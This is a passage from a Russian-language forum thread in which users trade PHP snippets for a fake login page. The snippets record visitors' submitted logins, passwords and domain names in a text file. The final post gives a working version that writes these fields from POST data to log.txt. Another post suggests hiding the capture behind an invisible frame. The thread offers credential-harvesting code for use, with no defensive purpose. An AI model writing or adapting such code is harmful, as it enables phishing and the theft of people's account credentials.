После ввода добавь функцию записи в фаил PHP: $log=fopen("log.txt", "a+"); //открываем файл //для добавлений fwrite($login,$pass); // записываем в него fclose($log); ps// PHP почти не знаю, если что поправте...
для начала Zitt , необходимо правильно задать переменные ($login,$pass), они могут быть не дефолтные... PHP: $log=fopen("log.txt", "a+"); $all="$user"; $all.=';'; $all.="$password"; $all.="\n"; fwrite($log,$all); fclose($log);
Хватает, 777 стоит. Sn@k3 При вставке кода, сохраняется только ";" переменные указал правильно. А не мог бы написать скрипт с этими параметрами. Или ты это имеешь ввиду?
Weed гг тебе необходимо их передать))), надеюсь ты понимаешь о чем я, а я бы делал вообще не так, кароче делаешь файл с двумя фреймами, один видм, другой иначе, назначаешь им имена, далее при нажатии на кнопку самой авторизации он передавал бы в нижний файл(с кодом) и всё... немного разнообразия, а ваще смотреть нужно)
я делал это так ипросто вставил его вверху второй страницы только надо проверить параметры pass login чтоп совпадали по написанию PHP: $fake = fopen("log.txt", "a"); fwrite($fake, " Логин: " .$_POST["Login"] ." Пароль: " . $_POST["Password"]. " Домен: " .$_POST["Domain"] ."\n"); fclose($fake);